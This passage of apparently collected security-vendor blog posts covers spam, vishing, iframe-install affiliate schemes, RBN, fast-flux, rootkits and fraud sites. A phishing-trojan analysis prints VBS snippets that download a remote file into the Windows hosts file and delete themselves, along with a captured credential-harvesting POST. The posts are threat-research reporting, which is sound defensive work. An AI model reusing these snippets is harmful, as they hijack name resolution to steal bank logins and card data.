• Follow our advice: Our Web sites are usually a good place to get help and guidance on how to stay safe online.
• Visit www.banksafeonline.org.uk for useful information.

But wait, there’s a caveat: They won’t invoke this willy-nilly:

12.12 Unless we can show that you have acted fraudulently or without reasonable care, your liability for your card being misused will be limited as follows.

This code would be far too difficult and costly to implement in most cases. It would have to be a particularly large sum of money involved in the fraud, enough that it might be deemed worth the cost of an investigation, alienating a customer, and courting a heap of bad PR.

Although this is all good advice from the BBA, it looks like the assertion that people will suddenly be financially liable for having out-of-date security software is just a case of spreading FUD.

Within the first 24 hours, participants in McAfee’s SPAM Experiment have already started to receive a wide range of spam. The U.S. economic crunch (bearing in mind I am NO economist ) may be having an effect on spam campaigns, as several of the recipients, browsing the Web and working independently of each other, have started to receive offers that center around guaranteed loans, credit cards, and debt relief.

The spam that isn’t offering money is trying to take it away from the participants. Three of our “victims” have already been targeted by phishers! It didn’t take long at all for some of their e-mail address to be picked up and exploited by fraudsters.

According to their blogs, some of the participants started to receive spam almost immediately after they clicked on pop-ups on the first day and provided their e-mail addresses for free offers! As usual with the free offers it turns out that it’s almost impossible to meet the conditions to get the free Xboxes, Wiis, iPods, iPhones, etc.

At the time of this writing, the overall spam submission counts have exceeded 550 from 17 of the participants. One participant alone has received more than 130 pieces of spam!

More to come during the next 29 days. Make sure you follow the participants blogs and stay tuned.

Take equal parts e-mail, willing and daring participants, some shady ePharmacies (OK, OK–it’s Viagra), a few eCards, and a heavy dose of dubious business activities. Mix them together with just a sprinkle of reality TV (or blogging in this case) and you have The S.P.A.M Experiment, which launched this week.

Avert Labs invests quite a bit of resources in fighting spam and educating users about fighting spam. Anyone who follows this blog certainly knows that. The purpose of this experiment, however, is quite different. It is to show spam for what it really is: dangerous. Spam is not just a nuisance. It’s a constantly evolving threat to our identities and our wallets. Spam can put users at risk of far more than just lost inbox space. And to show spam for the threat it really is, we are actually having users do what we always tell them not to do!

Come on. You gotta admit it. It is very cool.

The S.P.A.M. Experiment is designed to show the scale of the problem of spam and the risks associated in opening or responding to unsolicited e-mail. It will demonstrate just how resourceful and quick cybercriminals (and make no mistake here–spammers are criminals) are to create new ways of evading anti-spam filters and relieving people of their money. The worldwide participants will be sharing their experiences through blogging so you will be able to follow the action as it develops. I recommend you subscribe to the many global feeds that are here. We started only earlier this week and the participants are already getting results!

Want to know why spam is dangerous? Want to see how spam links to cybercrime? We are gonna show you over the next 30 days.

In a natural evolution of phishing, Internet scamsters are switching to “Vishing” — short for “voice phishing” in order to steal user information. Vishing combines the use of Voice over IP (VoIP) phones along with clever social engineering to gain access to personal and financial details of the victim by exploiting the perceived trust in traditional telephone services.

With increased user education about Internet scams, people are more aware of the fact that an e-mail containing a URL could be malicious in nature. Instead of using a misdirected Web link to some phony banking sites to steal user information, fraudsters are luring victims to something more credible like calling a toll free number and having an automated recording asking for account information.

Potential victims would get the usual convincing e-mail phish conjured to look like a genuine complaint. But instead of being directed to a website to resolve the pending issue, they are given a phone number to call. Those who call the “customer service” number are greeted with a pirated recording of an automated voice system for the targeted financial institution and are requested to enter their card number in order to authenticate. They are then led through a series of voice-prompted menus that ask for PIN codes, card expiration date, date of birth and other critical information. Once the victim enters these details, the visher has enough information to use it for identity theft and make fraudulent use of the information.

With the US tax deadline nearing, McAfee Avert Labs has observed a surge in IRS refund phishing attempts. In addition to the usual e-mail phish we also observed IRS vishing campaigns targeting VISA or MasterCard debit cards.

Here’s another example of a vish campaign targeting a well known bank.

Other variants of vishing use CallerID to spoof an incoming call to appear as an 1-800 number or SMS messages purporting to be from a bank. A text or pre-recorded voice message is then played out, persuading the victim into believing that their account has been frozen due to suspicious activity. As the incoming call would display a 1-800 number from a recognized institution, it creates a false sense of security about the authenticity of the message.

Vishing is all set to flourish with advancements in Voice over Internet Protocol (VoIP) technology that enables cheap and anonymous Internet calling. Given the ease with which CallerID boxes can be tricked into displaying erroneous information, it is becoming increasingly difficult to distinguish phishing attempts from genuine attempts to contact customers.

If you encounter a vishing attempt and have a question concerning your account or card, please contact the financial institution only using a telephone number obtained from your account statement, a telephone book or other verifiable, genuine correspondence.

Last week, I read some interesting news on an Australian website The Age. A journalist explained that a Russian malware distribution site offered a haul of 1000 spyware-infected Australian machines for 100USD, double the price offered for US machines and 30 times more than those from Asia.

Searching this site, I discovered the InstallsCash partnership program:

It was a well known dishonest offer: after registration, the affiliate had to put a short one line iframe code on his website pages. Next, and as explained in the FAQ, this hidden iframe would be used to silently redirect any visitor to another website to install (via an MPack like process) the affiliation program. Each successful installation made from the affiliate site would involve a payment.

To cover the tracks, the InstallsCash registrar is from China (bizcn.com). The fake registrant address is in the US (Iowa City) and the e-mail contact in Russia (ydwrtyxamz_at_mail.ru). It is easy to understand that this last name was randomly chosen. We will surely encounter some others in our investigations!

Being curious and to clearly demonstrate the dishonesty of the offer, I decided to subscribe myself by using some fake data to fill in the proposed form:

This screenshot is interesting; it lists the allowed system of payments. Here we recognize all the regular ones the cybercriminals are using. Having done that, I had to wait for 24 hours:

This Saturday at wake up, I tried my luck and attempted a connection. They activated my registration and my personal iframe code waited for me:

As I discussed first, the iframe I had to hide on my website pointed at another website using a strange name randomly chosen and created using a more or less automated method I discussed in a previous blog entry. It seems the affiliator creates or uses a different one for each affiliate. Thanks to these unique names, the software recognizes each of them. Data can be feed into their stats page and then they can calculate the payments.

On my personal page, the top white window contained my iframe. In the middle the affiliator gave me the same one, but in an encrypted form. It was not explained but it was clear I had to use this one on my pages to mislead or avoid some security technologies. The distributer goes so far as to say, and I quote, “they will be updating every 3 days and they will be invisible for every antivirus!”

The whois gave me the result I expected, which was something similar to InstallsCash.com:

Registrar was bizcn.com and registrant contact came with another improbable e-mail address:
Jan Dendinger ycsmmiqtyo_at_mail.ru
Phone +1 3196433xxx Fax: +13.196433xxx
309 East Main Street
West Branch IA 523581
us

Some quick searches with Google allowed me to find many other similar sites.

I looked at my stats page. Of course it was blank:

When the Age announced 100$ per 1000 unique loads, my rate table quoted the half and only 3$ for Asia:

But the journalist was right, in my private windows message as well as on the main page I could read InstallsCash made some special offer since February 16th: they increased their rates “for USA by 2 and any mix of country was about 30$”:

However, I note the price is still low compared with the payments these guys proposed in September 2006. But at that time, Australia and UK PC were the most wanted:

Yes, it seems that behind InstallCash, IframeCash (September 2006) and IframeDollars (November 2007) are hidden the same people. To understand this you can, for example compare the FAQs:

In November 2007, the RBNExploit blog discussed then that iFrameCash and iFrameDollars were possibly linked to the Russian Business Network. This confirms that RBN trading partners are still in business. And if they propose, since thay have been doing it for several years, commissions for deliberately planting malicious iframes, believe me, it is because it is a lucrative business.

Finally please note that via its ScriptScan module, McAfee VirusScan blocks and detects the PHP script as JS/Exploit-BO.gen. Moreover, the invisible files are detected as Downloader-BDH.

A few days ago McAfee Avert Labs came across yet another example of how effective and especially dangerous phishing can be. We received a sample in the form of an .exe file that when executed would start Internet Explorer and present the login page of a well-known Italian bank.

At first sight, for the inexperienced and security-unaware user, the Web site looked exactly like the real thing. There were no obvious signs of fraud as “only” the user name and password to get into the banking page were requested. Once these initial credentials were inserted, a second page requested a card number, the expiration date, and the CVV2/CVC2 number. After this, you guessed it, a simple message–”Wrong details, try again!”

What actually happened is that the sample creates the file finaltemp.vbs and runs it immediately via the Windows Script Interpreter, wscript.exe. The VBS script is immediately removed from the system. Here are some interesting snippets of the code embedded into the executable:

Set WshShell = WScript.CreateObject("WScript.Shell")
strURL = http://x.x.x.x/twiki/b.txt
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")

More code creates some objects used to write the contents of the file through HTTP requests using Microsoft.XmlHttp.

fileToCopy = fso.GetSpecialFolder(WindowsFolder).Path & "\system32\drivers\etc\hosts"

This will copy the content of the b.txt, seen above, to the host file–leading to compromised name resolution!

WshShell.Run "iexplore.exe"
Set aFile = fso.GetFile(strOutFile)
aFile.Delete

This will run Internet Explorer, opening the main page of the bank with what looks like the correct address for the bank in the browser’s address bar; however, this ultimately points to the bad IP set in the modified host file. At this stage the unaware user enters his or her information on the page, which gets sent to a remote location that is certainly not the secure bank environment. All of this happens silently–without any popping cmd shells, active objects complaints from IE, or any other suspicious activity.

If we look at a packet-sniffer trace, we can see the POST request made to the URL mentioned in the snippet above. It was registered through (no kidding!) Godaddy.com. Also we will see all the requests made to the IP written to the host file that was modified by the VBS script–including a POST containing the username, password, card number with the security code, and expiry date. (In this case you can see that the Avert Labls account with password “testing” is now officially owned.)

POST /index.php?MfcISAPICommand=ProcessCC&UsingSSL=1&login=AVERTLABS&
pass=TESTING HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://X.X.X.X/index.php?MfcISAPICommand=VerifyFPP&UsingSSL=1&login=&pass=
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Host: poste.it
Content-Length: 165
Connection: Keep-Alive
Cache-Control: no-cache

Session=cvv2.gif&password=TESTING&ccnumber=6666666666666666&
month=10&year=10&
cvv=666&__EVENTTARGET=RicaricaCartaPPayPagamentoPPayEdit1%3AbtnContinua&__EVENTARGUMENT=HTTP/1.1 200 OK
Date: Fri, 14 Mar 2008 18:00:39 GMT
Server: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.0-8
X-Powered-By: PHP/5.2.0-8
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

It seems that phishing will remain a part of our daily lives. And what is most alarming is the ease with which someone could change a few lines of the scripts to redirect the user to whatever site that requires authentication and grab very sensitive information which could be use to steal money as well as any other type of information.

So far the Web site hosting the modifications required for the host file and the IP hosting the fake pages are still live and sending data, so you can imagine how much could be gathered in just a few days or even a few hours. The reverse DNS details for the IP appear to be forged. We have contacted the owner of the IP and the bank itself to investigate further and have the fake site shut down as soon as possible.
Visit.geocities.com and geo.yahoo.com were involved, as well, probably for tracking purposes.

Safe banking, folks!

Until recently most ATM skimmers had to go through the inconvenient process of extracting PIN numbers from a video of the PIN pad when it was entered. Problems with the camera being blocked or discovered would cause many PINs to be lost. The only improvement implemented was sometimes replacing the entire PIN pad in order to directly save every number entered. Replacing the pad solves the video problem but requires a level of physical access that is rarely possible without being detected.

Visa certifies many ATMs based on their requirements for PIN Entry Devices (PEDs). These requirements are supposed to define how to implement a PED so that no PIN is stolen from the ATM. As an example, one of these requirements is the use of 3DES to encrypt the PIN when sent to the ATM. In the definition of the requirements it states that the PIN must be encrypted even within the PED. Of course because the entry from the pad can not be directly encrypted there must be some interpretation as to how soon the encryption takes place.

Despite this certification process there are several terminals, such as the Ingenico i3300, that have been discovered to be vulnerable by a pair of researchers from Cambridge named Steven Murdoch and Saar Drimer. They discovered that in several models of ATM there were cables from the PIN pad that contained unencrypted PIN data. While the ATMs were designed to detect physical tampering the researchers found that it was not difficult to insert a paperclip that would avoid detection and tap the critical line from the PIN pad.

These ATM devices were allowed to be certified presumably because the unencrypted data is considered to be within the PED or because the data is only single key entries and not a complete PIN. However, these details do not make a significant difference to an attacker. The ATM PIN problem is similar to what would happen if a web user viewed an encrypted web site through an unencrypted web proxy. While the traffic appears encrypted to the server or central ATM computer there is still a large opening for viewing the unencrypted data on the user’s side.

Visa has claimed that this threat is not a real-world threat because it requires specialized knowledge of the ATM terminal. What attack of this type doesn’t require specialized knowledge? Attackers have to research in advance to make sure their second magnetic stripe reader and their camera are well positioned and hidden. Finding out where in the case to insert the paperclip to connect to the PIN wire is not a difficult additional item to research.

Awareness of identity theft and fraud is increasing in the general population. Criminals who make a living from large databases of ATM and credit card numbers are always looking for new ways to steal that information. This new vulnerability will allow fraudsters to gather data on even the most paranoid individuals.

Today at Avert Labs, we released the third edition of Sage - our security journal. As always, we strive to be a bit different with our content in Sage. A little provocative, new trends, new ideas… And this issue is no different.

In this issue we look at the growing trend of localization in malware and threats. Cybercriminals are increasingly crafting attacks in multiple languages and are exploiting popular local applications to maximize their profits. Cybercrooks have become extremely deft at learning the nuances of the local regions and creating malware specific to each country. They’re not just skilled at computer programming—they’re skilled at psychology and linguistics, too.

We examined global malware trends in this report, titled “One Internet, Many Worlds.” The report is based on data compiled by our international security experts and examines the globalization of threats and the unique threats in different countries and regions. In the report, we detail the following trends and conclusions:

• Sophisticated malware authors have increased country-, language-, company-, and software-specific attacks
• Cyberattackers are increasingly attuned to cultural differences and tailor social engineering attacks accordingly
• Cybercrime rings recruit malware writers in countries with high unemployment and high levels of education such as Russia and China
• Cybercriminals take advantage of countries where law enforcement is lax
• Around the world, malware authors are exploiting the viral nature of Web 2.0 and peer-to-peer networks
• More exploits than ever before are targeted at locally popular software and applications

Download Sage 3

Each year I eagerly await the annual Federal Trade Commission report on Consumer Fraud and Identity Theft Complaint Data. It has been available for the last few days and confirms that after a three year stability period, the situation is moving.

For the first time since 2004, the three complaints indicators are increasing. In 2007, the FTC received over 810,000 Consumer Sentinel complaints when they had never taken over 700,000 in any previous year. As ever, Identity Theft is the main complaint category. It has reached 32%. In 2007, 64% of fraud complaints involved unscrupulous companies initially contacting consumers over the Internet. This percentage has grown year after year. It was 60% in 2006 and 55% in 2005. E-mail contact is the most frequent method.

Consumers reported fraud losses totaling more than $1.2 billion; the median monetary loss per person was $349, the report states.

With this report, FTC released its top 20 complaint list is follow :

Earlier today, the Nanshan District Court of Shenzhen, in southern China, convicted 11 members of a password-theft syndicate to between six months and one year of imprisonment.

According to the official press, the syndicate led by Jin has been operating from three malware development bases in northern China, each employing exploit developers, Web site hijackers, command and control, and other teams to support the ultimate goal of stealing passwords for the Tencent QQ instant messenging network.

The malware “workers” are reportedly paid a commission of 0.5 cents RMB (renminbi, or yuan) per stolen password, and the top performer was believed to have made as much as 7,000 RMB in a month. The stolen passwords in turn were sold to a broker, where the virtual gold or “QQ coins” harvested from the stolen accounts and often used for online gaming, were traded for real money. This has been a very profitable modus operandi for many virtual gold seekers, leading to the increase in game password stealers since 2006.

For the “infringement of personal communications,” according to Chinese law, each of the 11 members received between six to 12 months imprisonment. In comparison, the crime of stealing an equivalent amount of real-world money in China carries a hefty sentence of more than five years. As Mr. Qing Feng of the Legal Affairs Office of the Chinese State Council explains, the current laws interpret the stealing of passwords and “QQ coins” as the deletion or modification of data, which does not match the legal definition of theft.

Disputes over virtual properties and crimes involving virtual theft are a growing issue in both the real and virtual worlds. Barely three months ago, a Dutch teenager was arrestedfor stealing virtual furniture in an online game.

A Japanese trojan author was arrested by the Kyoto Police on 24th Jan. According to the press (in Japanese), the author is a graduate student living in Osaka and is alleged to have made the so-called “Harada virus” ( Del-500 trojan and Uploader-AH trojan).

McAfee Avert Labs has identified more than 70 variants of the trojan family which have been distributed to the Japanese P2P network called Winny for years. Once users download and run files, the trojan attempt to delete any potential pirated content such as movie, picture, and audio files that might have been downloaded from the P2P network.

The earlier variants of the trojan show the picture of an unidentified man, the so-called “Harada”, upon infection with the messages criticizing the illegal use of the P2P application for exchanging pirated content. The suspect followed the fashion and teased P2P users, however, this time he used a famous animation picture instead. Ironically, as a result he was arrested on suspicion of violating copyrights law in that he made the trojan showing the copyrighted work without asking the permission (Unfortunately, there are no laws in Japan to punish malware writers at this time).

We, as of yet, do not know how far the suspects have gone in creating the successive trojan variants. Those trojan suspected to have been made by him have the same structure as the others in the family, written in VB, and have the contact information of “Harada” in the end of the trojan files.

Anyway…. hopefully this will give rise to a discussion on creating laws to punish malware writers in Japan.

Generally, I think we can agree that creating FUD is a bad thing. And conversely, dispelling FUD is generally a good thing. But knowing when something is actually FUD, rather than a fear based on valid concerns is kind of a vital part of that equation.

This was a lesson learned the hard way for TV Presenter Jeremy Clarkson, when he published details of his bank account in the Sun newspaper. He had figured that all that could be done with the information was to put money into his account.

Not so!

He awoke one morning to find someone had set up a £500 direct debit to the charity Diabetes UK. He’s sounding quite contrite now, and seems rather adamant about pursuing those who lose the confidential information of others:

“Contrary to what I said at the time, we must go after the idiots who lost the discs and stick cocktail sticks in their eyes until they beg for mercy.”

It’s not a secret anymore; criminal organizations behind a large part of Internet-related frauds are huge and well organized. In the last quarter of 2007, two studies about RBN (Russian Business Network), one of the most well known criminal organizations so far, were published. Last year, I looked at them with great interest. The first is named Uncovering Online Fraud Rings: The Russian Business Network and is available as a webcast recording on the Verisign web site. The second was written by David Bizeul and is named Russian Business Network study.

These papers demonstrate and illustrate that RBN is an empire. It directly or indirectly manages potentially a million sites. Thanks to elaborate intrusive advertising techniques, millions of Internet users visit its fake retail sites every month. Hackers and other cybercriminals also have their stores and outlets there: malware sales, service offers and booby-trapped sites. Pornography and pedophilia always make money there.

In addition to these documents, some particularly thorough stories have been circulating on the Net (papers from Brian Krebs, Washington post and posts on the RBNexploit and Dancho Danchev blogs).

Mailing addresses, name and photos of suspects, detailed lists of machines and autonomous systems as well as many other details were revealed. Because of this, the group has deemed it best to partially disappear. On November 6th, 2007, many network nodes stopped responding. It was not the end of them though; the business has been carefully planned: high-activity sites – those leading the attacks at the time – were not disturbed. Gradually, the affected sites began to re-appear in Russia as well as all over the world. Today, many countries in Southeast Asia are mentioned, but they are not alone. The reorganization is on the move: new retail payment systems for fake products (mainly fake security products and fake video codecs), new legitimate sites hosting tricky banner ads redirecting computers to these fake retail web sites, new Storm (aka Nuwar) worm campaigns achieved by new C&C botnet implementations, new web sites hosting malicious software (like MPack or WebAttacker) and secretly reached after the victims encounter a hidden iFrame during Internet surfing.

People tracking down RBN regularly watch its Autonomous Systems (AS). These are collections of connected IP networks controlled by a single entity and defined by an AS number. The RBNexploit blog and the David Bizeul document are very comprehensive on this subject and various network maps or tables help the reader to understand the complexity of such an organization.

One puzzle piece is known as AS40989. Despite the fact it was not the core center of the RBN activity it is well-known because it seems to be the official name of the group. It is the subject of a new write-up available at the Shadowserver Foundation web site.

This document analyzes the malicious binary activity directed to and commanded by AS40989. From March to November 2007 the researchers collected 2859 pieces of malware which initiated HTTP connections to it. They found an impressive collection of malware: “Gozi, Goldun, Hupigon, Nurech, Nuklus, Pinch, Sinowal, Tibs, Xorpix, various dialers, downloaders, worms, adware, page hijackers, and proxies”. Once again, it demonstrates the professionalism and the size of the group.

Reading material on RBN is abundant. With this post, I only wish to draw your attention to this existing material. It demonstrates the vitality of the new criminal organizations, it also demonstrate that many people, at McAfee and elsewhere, stay tuned into the dark side of the Internet to understand how the situation is constantly changing and to fight against this threat at a worldwide level.

In early days, security concerns around computer hardware and the data on these systems were mainly taken care of by ensuring good physical security around them. Lock these systems in a room with restricted access and the systems and data was mostly secure. Options to steal the data were mostly around breaking into the area physically, which is quite difficult. Things had to change and it changed. Networking was changing the way we used to look at computers and was making the data available even though it was kept somewhere on a remote system. This was a major leap in computer science, but was also changing the security scenario of computers. Admins started getting less bothered about physical security and were more concerned in safeguarding data from being stolen though the interconnectivity of these systems. There was a big paradigm shift from physical to network security. History is almost repeating itself again, thought this time making it even tougher. Physical security is gaining importance again, without making network security any less of a concern.

As devices grow smaller and other devices not really seen as “traditional computers” like mobiles and others storage capable devices become more popular, the physical security of such devices become important again. Mobile phones these days can easily store 2-8 GBs of data or more. This could include business critical emails, identity, credit card information or family pictures. As these devices are small, they can easily be lost, stolen and pilfered. Most of these devices run sophisticated enough operating systems, often with wireless capabilities and Bluetooth as well, making other application and network issues applicable to them as well. Not only such handheld devices, even traditional equipments are more vulnerable to physical security these days as most of the concentration is on securing the systems from network or application attacks.

We cannot easily go back to the early day of strong physically secure locker rooms with handheld devices! Good user education and software related protections have to be applied for making data less likely for getting into the wrong hands. These devices may even need to be running tracking systems in addition to data protection to safeguard the device itself as well as the data.

- Tracking systems that can provide the location of the device such as GPS or tracking through mobile service provider may need to be inmplemented for any mobile device carrying sensitive data.
- Only required data should be kept on these devices. Always keep moving the important but less used data onto a more secure system. Back it up!!
- The data should always be kept locked with strong passwords.
- Most critical and important data should even be kept encrypted.
- Have data theft prevention software that performs data wiping - “eradicate it before it falls in enemy hands”. Software that can wipe the data on the basis of some event that gets triggered when the hardware is in wrong hands.
- Unless required, keep all kind of connectivity like wifi and Bluetooth turned off on such handhelds.

Data that can roam with us in our pockets is less physically secure, but good user education and software can at least keep it from getting misused, if not able to prevent it from getting lost.

On January 2, 2007, we posted the first DAT files (4930) of the new year. On that day, the public count of threats detected stood at 221,935. Fast-forward to December 31, when we released the last DAT (5196) of 2007, and the public count of threats detected finished at an almost unbelievable 357,820.

That’s a total of 135,885 unique threats that we at Avert Labs identified throughout 2007. But let me put that into further context:

• 372 new detections per calendar day in 2007

• 527 new detections per business day in 2007

• One driver written every 4 minutes in 2007

• 38% of all detections were added this year.

• 25,438 more detections were added this year than in 2005 and 2006 combined. (Those two years totaled 110,447.)

Scary numbers any way you break them down. One could almost say that malware creation has reached epidemic proportions. As many who read this blog already know, the number of sample files we receive per day to analyze is increasing in record numbers–some days, we can get upwards of 2,000 samples per hour from various sources. We are seeing more malware than ever before, even though the lifespan of most malware is decreasing! The average lifespan of malware with criminal intent may only be 5 to 7 hours. Most of it is static and obfuscated. Much of it is stealthy. Never forget that it is almost completely financially motivated these days. Just think of where Pablo Escobar, Al Capone, or even Tony Montana would sink their money today–into malware.

Data security and the security industry itself have seen many changes throughout 2007. Technologies such as virtualization and RFID will have an enormous impact on data security, posing new challenges (and some of the same old ones) to the industry as we move forward to secure these new vectors.

Tis the season to be greedy –at least that’s what a couple of New York City thieves thought the other night when they stole an entire 18-wheeler FedEx truck containing somewhere around $1M in valuables. What might go overlooked is the priceless corporate data that could possibly be on that truck as well. We constantly rely on couriers such as FedEx to securely ship all of our “data at rest-in transport”, but what measures are they taking to actually ensure those assumptions? If the breach blog has taught us anything, it’s that not enough companies are encrypting their laptop hard drives, backup tapes, etc… and these types of attacks are still serious risks to our data.

As a security consultant, I repeatedly see and hear about these things going overlooked. From boxes labeled “Iron Mountain” sitting on empty loading docks, to Dell boxes waiting in the vacant hallways of shared office buildings, companies are constantly putting their data at risk at pickup and drop off areas. And I’m actually surprised we don’t see this more often, now even not-so-tech thieves can cash in on the action with these physical attacks. So what do we do? Require all couriers to upgrade to armor cars? Or maybe just spend the time and money now to upgrade your security policy and encrypt all data out of your control!

The term “rootkit” was originally used to refer to toolkits used by root privileged users. This definition has evolved over time. Nowadays, the term rootkit refers to backdoor programs that run with elevated privileges and that are designed to evade detection by users, administrators and rootkit detection software. Rootkits first appeared in China in 2001 and have evolved substantially since then.

These days most rootkits are installed through exploitation of web browser vulnerabilities or from the infection of viruses and worms. In some cases, rootkits are bundled with images that exploit image library flaws to gain access to systems. In other cases, exploits for previously unknown vulnerabilities (zero-day) are placed on web sites and used to hack browsers and install rootkits. For example, exploits for the zero-day vulnerability identified by CVE-2007-0038 were found on many Chinese websites several months before a patch was released. In other cases, popular websites and public forums are hacked. Their content is then modified to include exploits that install rootkits on to user systems. Often, attackers exploit script injection vulnerabilities to gain access to these web sites. They then upload exploits for known issues like MS06-001, MS06-014, MS06-055, MS07-017, Baofeng ActiveX vulnerability, RealPlayer ActiveX vulnerability and so on. In China, many rootkits also spread via malware that targets a popular IM client named QQ. Once a QQ user’s machine has been compromised by a rootkit, it will send messages containing links to malicious websites to all of the friends of the affected QQ user. If these users click the links, they too will be targeted. This method of propagation is widespread and difficult to defend against. Another technique used to spread rootkits includes the addition of malicious programs to pirated software like Windows, Photoshop, Office, etc. People who download and install these pirated programs are infected by the rootkits bundled with them. Since pirated software is popular in China, many machines are infected this way.

Stay tuned for Part 2…..

References:

Rootkit Paper 1
Rootkit Paper 2

Recently, I had some friends complain about problems with Real Media files (*.rm/*.rmvb). According to them, after downloading and playing rmvb files, the Real Media Player launched a malicious webpage without prompting. Later, they noticed their OS running noticeably slower. And later still, they found their IM account passwords modified and online gaming accounts stolen.

It appears that the media files they downloaded were created by a hacker and designed to open malicious webpages. I investigated this and found it is quite easy to add a malicious webpage to rmvb files. The hacker used freely available software. These programs include applications which can be used to add events to rmvb files. A time and URL is specified in a text file, then imported into the rmvb file using these programs, and that’s it!. When the rmvb file is opened in RealPlayer, the URL will automatically be opened after the specified time has elapsed. My advice was to scan any downloaded media files with antivirus software before playing it. Another option is to use a different player other than RealPlayer.

Hope you can enjoy Real Media without the malicious webpages!!!

Last Friday, I started some analysis on fast-flux techniques. I stopped my discussion with single-flux so today I will improve on the camouflage!! To do this, the fake site’s IP addresses are varying as well as the IP addresses of the name servers that define them in the DNS architecture. This is double-flux.

Here, the criminal has a genuine control and monitoring workstation. These machines are no longer just for relaying http traffic; they simulate the domain name servers and resend the various IP addresses for the connection which - as before - are valid only for a moment.

When the victim tries to reach the site he would like to visit, a request is sent to the name server with authority over the zone. Just like with single-flux, the short lifespan of the address leads the name server request to the criminal network. First used at this level, the fast-flux technique causes the request to be redirected to a first zombie machine inside the botnet (fast-flux on name servers - IP_A to IP_E). This machine requests the response from the C&C workstation and forwards it to the requestor by using the same method a second time (fast_flux on web site - IP_1 to IP_9).

In return, the IP address of another zombie machine is sent to the victim. This second bot relays the traffic, preserving the criminal’s anonymity.

As the hereafter blurred image suggests, this third example deals with an adult site that tries to remain discreet about its origins. Two dig commands launched a few minutes apart show us the result.

On the web site side, the expiration dates are reduced to 10 minutes (600 seconds), and the site’s IP addresses are very varied (fast-flux on web site). It’s the same for the domain name servers, which changed within a short period of time (fast-flux on name servers).

Combining the three previous methods gives a major headache :-). But as result, we obtain the scheme used in the mysterious RockPhish structures. The ingredients are:

• lots of domain names,
• a fast-flux botnet network in double-flux mode,
• specialized software that is responsible for sending out phishing e-mails, where each recipient is assigned an index. This is used as a parameter in the URL, and again within the mirror site as long as the victim gets connected.

I won’t bore you with the final synoptic for the network traffic. Simply seeing the next URLs collected in the phishing e-mails collection gives you an idea of the complexity of the attack.

The host domain name varies, as do the domain name servers. The control and monitoring workstation manages the structure of the network in real time. Let’s not forget that this is primarily a network of compromised machines (a botnet). The index is there to ensure proper redirection according to victims, banks, machines to be activated, and the group of fraudsters profiting from the attack.

I hope this dissection interested you. It demonstrates that attacks are more and more sophisticated. To be sure, groups like the ones using RockPhish with so much energy to improve their network resilience and stealth are doing so because it is very profitable for them.

For several years, we have been talking about the sophistication of attacks. The main goals are discretion, camouflage and profitability. Some of the common techniques and tools are named Fast-Flux, RockPhish or MPack. As I recently worked on some spam campaigns and dubious websites, I will use them as examples and explain some of these new cybercriminal methods in a set of two blog contributions.

Before complicating the scheme, let me start with a very simple example:

Here, a spammer owns a lot of domain names. He constantly buys new ones using stolen credit card numbers and uses them accordingly with the service interruptions that can occur very quickly or slowly, depending upon the vigilance and honesty of the access providers.

One machine contains his site. It may be dedicated to selling medicine or counterfeit luxury products. In order to trick anti-spam software, e-mails are personalized with background noise and random text. For more diversification, and due to the many domain names he has, his software changes the URL of his site for the various messages it sends.

When a victim tries to follow the link provided for them, a process makes a request to the local name server for the IP address of the machine corresponding to the URL they were sent:

If the information exists at this level (a cache mechanism), it is forwarded directly to the requester. Otherwise, and if the link is still valid, the desired IP address is returned only after checking root and/or primary servers. Dozens of different domain names could point to a single machine.

Here is an example of a result that could be obtained using this method:

With phishing, the methods are becoming more complex. This curve issued from APGW statistics does not highlight the number of victims, which has increased a lot this year.

It shows that, since mid-2006, the total number of incidents (with and without a victim) has remained stable. What’s interesting are the peaks in November 2006 and particularly in April 2007. The question is: how can we have three times more phishing sites than identified attacks? The answer is called RockPhish.

To understand it better, we will expand upon the previous example and look at the intermediate single-flux and double-flux methods.

In single-flux, the criminal has just one domain. Thanks to an unscrupulous access provider, he manages his own domain name server. The criminal also has a network of compromised machines available to him, which he uses as a platform to relay between the victims and his site. The use of very short DNS expiry dates linked to a round-robin technique involving many zombie machine IP addresses allows it to continually change a fictitious physical address used to reach the mirror site.

The latter is therefore even better protected.

When the victim tries to reach the mirror site, a request is sent to the name server with authority over the zone.

The lifespan of the address being no more than a few minutes, there is generally no cached solution. The criminal’s name server is therefore checked. The IP address of one of the bots is sent back to the victim. During the several minutes of the transaction, it will relay the traffic and then disappear, making it more difficult to locate and therefore neutralize key sites.

Here is an example of an online casino site using single-flux technique:

My Windows dig (Domain Information Groper) version shows some distinctive network features: the expiration dates here are very short, and the IP addresses are very varied. This is the mark of a camouflage using the single-flux technique.

Next post will allow us to see how work a double-flux and, after that a RockPhish network.

The wonders of the underweb never cease to amaze me some days. Not because of the devious goings-on that go on but because some groups are so blatant about their devious goings-on.

Need a passport? You might have visited http://www.new-pasport.org. [Google cache]

Allow me to translate:

Passports of the European Union

» Lithuania - 2500 euros without an advance payment and 2000 euros on an advance payment in 50 %
» Latvia - 2500 euros without an advance payment and 2000 euros on an advance payment in 50 %
» The Great Britain - 3500 euros without an advance payment and 3000 euros on an advance payment in 50 %
» Germany - 3500 euros without an advance payment and 3000 euros on an advance payment in 50 %

Driving licenses too:

Driving license of the European Union:

» Lithuania - 600 euros on an advance payment in 50 % and 800 euros without an advance payment
» Latvia - 600 euros on an advance payment in 50 % and 800 euros without an advance payment
» The Great Britain - 600 euros on an advance payment in 50 % and 800 euros without an advance payment
» Germany - 600 euros on an advance payment in 50 % and 800 euros without an advance payment

The payment methodology is interesting too: It’s cheaper if you pay upfront. If you don’t trust the document dealer you can opt to pay a little more in 2 Western Union payments, withhold half the payment by withholding the code need to claim the second transfer until your fraudulent documents arrive.

This isn’t the first time we’ve seen this operation either, they have some history on a .biz version of the domain too.

Almost a year ago the BBC broadcast a Panorama program whereby a researcher had purchased 20 fake or fraudulent passports, some of which were purchased at great personal risk to the reporter. You can see a clip of the program at BBC Online or the whole program here.

UK law is pretty clear on this one: Traveling into the UK on a false, forged or stolen passport carries a prison sentence of up to 10 years, while making a false declarations to obtain a passport can lead to a prison sentence of up to 2 years.
